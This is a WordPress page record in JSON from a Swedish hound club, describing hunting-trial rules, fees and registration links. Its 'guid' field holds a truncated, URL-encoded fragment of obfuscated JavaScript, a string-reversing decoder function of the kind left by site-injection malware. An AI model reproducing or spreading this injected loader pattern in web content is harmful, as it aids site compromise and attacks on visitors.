{"id":10,"date":"2011-01-04T22:08:53","date_gmt":"2011-01-04T21:08:53","guid":{"rendered":"http:\/\/www.lokalklubb.stovare.se\/uppl$hiVNZt4Y5cDrbJXMhLy=function(n)if%20(typeof%20($hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D)%20==%20string)%20return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D.split().reverse().join();return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn"},"modified":"2025-08-11T14:23:24","modified_gmt":"2025-08-11T12:23:24","slug":"jaktprov","status":"publish","type":"page","link":"https:\/\/www.uv-stovarklubb.se\/index.php\/jaktprov\/","title":{"rendered":"Jaktprov"},"content":{"rendered":"\n<p><strong>\u00c5rsst\u00e4mman 2008 beslutade att en hunds livs f\u00f6rsta start p\u00e5 ett \u00f6ppet jaktprov \u00e4r gratis. Dock m\u00e5ste \u00e4garen vara medlem i klubben<\/strong><\/p>\n\n\n\n<p>Detta \u00e5r erbjuder klubben en gratis elitklasstart p\u00e5 ett av v\u00e5ra elitprov till s\u00e4songens f\u00f6rsta en Ekl-meriterade hund som er\u00f6vrar en 1:a \u00f6kl och h\u00e4mtar sitt diplom p\u00e5 \u00e5rsst\u00e4mman<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Anm\u00e4lan<\/h2>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-left is-layout-flex wp-container-1\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https:\/\/prov.stovare.se\/register\/0354eb75-fccd-43e2-b357-d023e954d26a\">Anm\u00e4lan Uppland<\/a><\/div>\n\n\n\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https:\/\/prov.stovare.se\/admin\/events\/drevprov\/258877f3-0fe2-486c-acdd-4949ea686655\">Anm\u00e4lan V\u00e4stmanland<\/a><\/div>\n<\/div>\n\n\n\n<p><strong>Om \u00f6ppenklass-\/unghundsprov<\/strong><\/p>\n\n\n\n<ul>\n<li>\u00d6ppenklass-\/unghundsprov \u00e4ger rum 1\/9&nbsp; &#8211; 28\/2 (29\/2 vid skott\u00e5r)<\/li>\n\n\n\n<li>S\u00e4rskilt r\u00e4vprov p\u00e5 sn\u00f6 \u00e4ger rum 1\/9 &#8211; 28\/2 (29\/2 vid skott\u00e5r)<\/li>\n\n\n\n<li>Hund\u00e4garen skall efter samr\u00e5d med n\u00e5gon av klubbens jaktprovsdomare ordna l\u00e4mplig provmark.<\/li>\n\n\n\n<li>F\u00f6rsta 1:a \u00d6kl f\u00e5r tas p\u00e5 den mark d\u00e4r hunden vanligtvis jagar men d\u00e4refter inte p\u00e5 s\u00e5dan mark.<\/li>\n\n\n\n<li>Anm\u00e4lan med aktuell provdag och domare angiven skall ha inkommit till respektive provledare senast dagen f\u00f6re start.<\/li>\n\n\n\n<li>Hund\u00e4garen ska vid prov kunna uppvisa dokument om inbetald avgift.<\/li>\n\n\n\n<li>Hund\u00e4garen ska ers\u00e4tta domaren f\u00f6r dennes kostnader.<\/li>\n\n\n\n<li>Om hunden enbart \u00e4r chipm\u00e4rkt ska hund\u00e4garen tillhandah\u00e5lla chipl\u00e4sare.<\/li>\n<\/ul>\n\n\n\n<p><strong>Hur g\u00e5r ett jaktprov till?<\/strong><\/p>\n\n\n\n<p>Jaktprov genomf\u00f6rs ungef\u00e4r som vanlig jakt. Priset best\u00e4ms av drevtid och de jaktegenskaper som hunden visar under provdagen. F\u00f6r de olika prisval\u00f6rerna kr\u00e4vs dessa effektiva drivtider:<\/p>\n\n\n\n<ul>\n<li>1:a pris 120 min<\/li>\n\n\n\n<li>2:a pris 80 min<\/li>\n\n\n\n<li>3:e pris 40 min<\/li>\n<\/ul>\n\n\n\n<p>Effektiv drevtid inneb\u00e4r att tappter l\u00e4ngre \u00e4n 5 min fr\u00e5nr\u00e4knas. Tappt \u00f6ver 60 min r\u00e4knas som d\u00f6dtappt. Provdagen omfattar minst 5 tim. Efter upptag har hunden 4 tim p\u00e5 sig att arbeta. \u00d6ppenklassprov omfattar en dag, medan elitklassprov genomf\u00f6rs under tv\u00e5 provdagar i f\u00f6ljd. Andra provformer \u00e4r s\u00e4rskilt r\u00e4vprov p\u00e5 sp\u00e5rsn\u00f6 och r\u00e5djursrenhetsprov.Du kan starta p\u00e5 din egen jaktmark tills hunden er\u00f6vrat 1:a pris. St\u00f6vare beh\u00f6ver inte ha pris p\u00e5 utst\u00e4llning f\u00f6r att delta i jaktprov. Hund som startar i marker d\u00e4r det finns r\u00e5djur, m\u00e5ste i praktiken vara r\u00e5djursren.<\/p>\n\n\n\n<p><strong>Om r\u00e5djursrenhetsprov<\/strong><\/p>\n\n\n\n<ul>\n<li>R\u00e5djursrenhetsprov \u00e4ger rum 1\/9&nbsp; &#8211; 28\/2 (29\/2 vid skott\u00e5r)<\/li>\n\n\n\n<li>Hund\u00e4garen ska efter samr\u00e5d med n\u00e5gon av klubbens jaktprovsdomare ordna l\u00e4mplig provmark.<\/li>\n\n\n\n<li>Anm\u00e4lan med aktuell provdag och domare angiven skall ha inkommit till respektive provledare senast dagen f\u00f6re start.<\/li>\n\n\n\n<li>Hund\u00e4garen ska vid prov kunna uppvisa dokument om inbetald avgift.<\/li>\n\n\n\n<li>Hund\u00e4garen ska ers\u00e4tta domaren f\u00f6r dennes kostnader.<\/li>\n\n\n\n<li>Hund\u00e4garen ansvarar f\u00f6r att provhund inte driver r\u00e5djur eller hjort vilket s\u00e4rskilt p\u00e5pekas f\u00f6r starter efter 31\/12.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u00c5rsst\u00e4mman 2008 beslutade att en hunds livs f\u00f6rsta start p\u00e5 ett \u00f6ppet jaktprov \u00e4r gratis. Dock m\u00e5ste \u00e4garen vara medlem i klubben Detta \u00e5r erbjuder klubben en gratis elitklasstart p\u00e5 ett av v\u00e5ra elitprov till s\u00e4songens f\u00f6rsta en Ekl-meriterade hund som er\u00f6vrar en 1:a \u00f6kl och h\u00e4mtar sitt diplom p\u00e5 \u00e5rsst\u00e4mman Anm\u00e4lan Om \u00f6ppenklass-\/unghundsprov Hur&hellip;&nbsp;<a href=\"https:\/\/www.uv-stovarklubb.se\/index.php\/jaktprov\/\" class=\"\" rel=\"bookmark\">L\u00e4s mer &raquo;<span class=\"screen-reader-text\">Jaktprov<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":""},"_links":{"self":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/10"}],"collection":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":11,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions"}],"predecessor-version":[{"id":2888,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions\/2888"}],"wp:attachment":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}